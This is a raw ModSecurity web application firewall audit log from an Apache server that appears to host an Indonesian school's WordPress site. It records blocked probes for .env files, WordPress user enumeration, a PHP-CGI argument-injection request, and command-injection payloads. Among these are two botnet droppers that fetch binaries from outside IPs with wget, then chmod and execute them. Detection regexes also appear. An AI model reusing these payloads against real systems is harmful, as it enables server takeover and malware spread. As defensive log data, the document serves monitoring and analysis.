[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://39.71.37.34:38505/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://39.71.37.34:38505/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749501862311976 2950 (- - -) Stopwatch2: 1749501862311976 2950; combined=975, p1=695, p2=235, p3=0, p4=0, p5=45, sr=120, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7951061-Z-- --8c9f5134-A-- [10/Jun/2025:03:52:39 +0700] aEdJl2kffiosQXBbxVZQsQAAAME 103.236.140.4 56204 103.236.140.4 8181 --8c9f5134-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.14.250.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.14.250.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8c9f5134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c9f5134-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749502359559343 3266 (- - -) Stopwatch2: 1749502359559343 3266; combined=1237, p1=427, p2=781, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c9f5134-Z-- --3e1fc02a-A-- [10/Jun/2025:04:16:21 +0700] aEdPJWkffiosQXBbxVZQxQAAANE 103.236.140.4 56398 103.236.140.4 8181 --3e1fc02a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.65.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.65.83 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3e1fc02a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e1fc02a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749503781148596 952 (- - -) Stopwatch2: 1749503781148596 952; combined=351, p1=312, p2=0, p3=0, p4=0, p5=38, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e1fc02a-Z-- --81b0331f-A-- [10/Jun/2025:05:14:10 +0700] aEdcsmQJEkWdvAT5oU6e4AAAABg 103.236.140.4 56992 103.236.140.4 8181 --81b0331f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 94.136.185.169 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 94.136.185.169 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --81b0331f-C-- --81b0331f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81b0331f-E-- --81b0331f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749507250834208 5585 (- - -) Stopwatch2: 1749507250834208 5585; combined=3475, p1=574, p2=2858, p3=0, p4=0, p5=43, sr=131, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81b0331f-Z-- --5e17b57b-A-- [10/Jun/2025:05:14:50 +0700] aEdc2mQJEkWdvAT5oU6e8AAAABI 103.236.140.4 57024 103.236.140.4 8181 --5e17b57b-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.249.58.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.249.58.161 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; STK-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --5e17b57b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e17b57b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749507290890216 750 (- - -) Stopwatch2: 1749507290890216 750; combined=259, p1=226, p2=0, p3=0, p4=0, p5=32, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e17b57b-Z-- --4db21067-A-- [10/Jun/2025:05:44:08 +0700] aEdjuJSz29O8wd7wtMvHlgAAAJY 103.236.140.4 58708 103.236.140.4 8181 --4db21067-B-- GET /www/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 Accept-Charset: utf-8 --4db21067-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4db21067-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749509048854909 832 (- - -) Stopwatch2: 1749509048854909 832; combined=321, p1=271, p2=0, p3=0, p4=0, p5=49, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4db21067-Z-- --247fcd2a-A-- [10/Jun/2025:05:54:21 +0700] aEdmHZSz29O8wd7wtMvHoQAAAJA 103.236.140.4 58794 103.236.140.4 8181 --247fcd2a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 Accept-Charset: utf-8 --247fcd2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --247fcd2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749509661840773 881 (- - -) Stopwatch2: 1749509661840773 881; combined=341, p1=299, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --247fcd2a-Z-- --223d721f-A-- [10/Jun/2025:06:19:43 +0700] aEdsDzQZgo88hy0TiYz3yQAAAFM 103.236.140.4 59044 103.236.140.4 8181 --223d721f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 15.235.143.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 15.235.143.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --223d721f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --223d721f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749511183678897 3585 (- - -) Stopwatch2: 1749511183678897 3585; combined=1613, p1=549, p2=1023, p3=0, p4=0, p5=41, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --223d721f-Z-- --68b15b5f-A-- [10/Jun/2025:06:34:47 +0700] aEdvl2QJEkWdvAT5oU6fbgAAAA0 103.236.140.4 59162 103.236.140.4 8181 --68b15b5f-B-- GET /src/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; KIICAA POWER) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --68b15b5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68b15b5f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749512087792879 870 (- - -) Stopwatch2: 1749512087792879 870; combined=341, p1=300, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68b15b5f-Z-- --6e804d46-A-- [10/Jun/2025:06:55:06 +0700] aEd0WjQZgo88hy0TiYz38QAAAEs 103.236.140.4 59330 103.236.140.4 8181 --6e804d46-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 120.48.45.123 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 120.48.45.123 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --6e804d46-C-- --6e804d46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e804d46-E-- --6e804d46-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749513306870366 5447 (- - -) Stopwatch2: 1749513306870366 5447; combined=3289, p1=514, p2=2724, p3=0, p4=0, p5=50, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e804d46-Z-- --b5f38713-A-- [10/Jun/2025:07:18:37 +0700] aEd53ZSz29O8wd7wtMvHwwAAAIY 103.236.140.4 59572 103.236.140.4 8181 --b5f38713-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.66.56.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.66.56.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b5f38713-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5f38713-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749514717922020 2847 (- - -) Stopwatch2: 1749514717922020 2847; combined=1239, p1=424, p2=787, p3=0, p4=0, p5=28, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5f38713-Z-- --361dc34b-A-- [10/Jun/2025:07:48:00 +0700] aEeAwDQZgo88hy0TiYz4TwAAAFQ 103.236.140.4 59794 103.236.140.4 8181 --361dc34b-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/x86;chmod+777+*;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm7;chmod+777+*;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm4;chmod+777+*;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm5;chmod+777+*;./arm5+arm5 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --361dc34b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --361dc34b-E-- --361dc34b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/x86;chmod 777 *;./x86 x86;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm7;chmod 777 *;./arm7 arm7;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm4;chmod 777 *;./arm4 arm4;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm5;chmod 777 *;./arm5 arm5: cd/tmp rm -rf j nohup wget http://94.26.90.251/x86 chmod 777 * ./x86 x86 cd/tmp rm -rf j nohup wget http://94.26.90.251/arm7 chmo..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749516480912786 2914 (- - -) Stopwatch2: 1749516480912786 2914; combined=893, p1=517, p2=334, p3=0, p4=0, p5=41, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --361dc34b-Z-- --f0267b10-A-- [10/Jun/2025:08:15:32 +0700] aEeHNGQJEkWdvAT5oU6g6AAAAAI 103.236.140.4 38006 103.236.140.4 8181 --f0267b10-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 172.102.125.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 172.102.125.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f0267b10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0267b10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749518132151914 2800 (- - -) Stopwatch2: 1749518132151914 2800; combined=1272, p1=434, p2=809, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0267b10-Z-- --16083163-A-- [10/Jun/2025:08:15:44 +0700] aEeHQGkffiosQXBbxVZTZgAAANA 103.236.140.4 38012 103.236.140.4 8181 --16083163-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.68.195.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.68.195.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --16083163-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16083163-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749518144201674 3258 (- - -) Stopwatch2: 1749518144201674 3258; combined=1430, p1=489, p2=910, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16083163-Z-- --eaaf4b29-A-- [10/Jun/2025:08:43:44 +0700] aEeN0DQZgo88hy0TiYz6JgAAAEA 103.236.140.4 38178 103.236.140.4 8181 --eaaf4b29-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.11.83.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.11.83.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eaaf4b29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaaf4b29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749519824192320 2349 (- - -) Stopwatch2: 1749519824192320 2349; combined=1033, p1=334, p2=673, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaaf4b29-Z-- --fc2be40e-A-- [10/Jun/2025:09:15:37 +0700] aEeVSWQJEkWdvAT5oU6hNQAAABg 103.236.140.4 38652 103.236.140.4 8181 --fc2be40e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.100.216.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.100.216.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fc2be40e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc2be40e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749521737453456 3351 (- - -) Stopwatch2: 1749521737453456 3351; combined=1466, p1=484, p2=951, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc2be40e-Z-- --63d7c770-A-- [10/Jun/2025:09:21:59 +0700] aEeWx5Sz29O8wd7wtMvJUgAAAJQ 103.236.140.4 38698 103.236.140.4 8181 --63d7c770-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.65.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.65.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --63d7c770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63d7c770-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749522119940809 860 (- - -) Stopwatch2: 1749522119940809 860; combined=335, p1=294, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
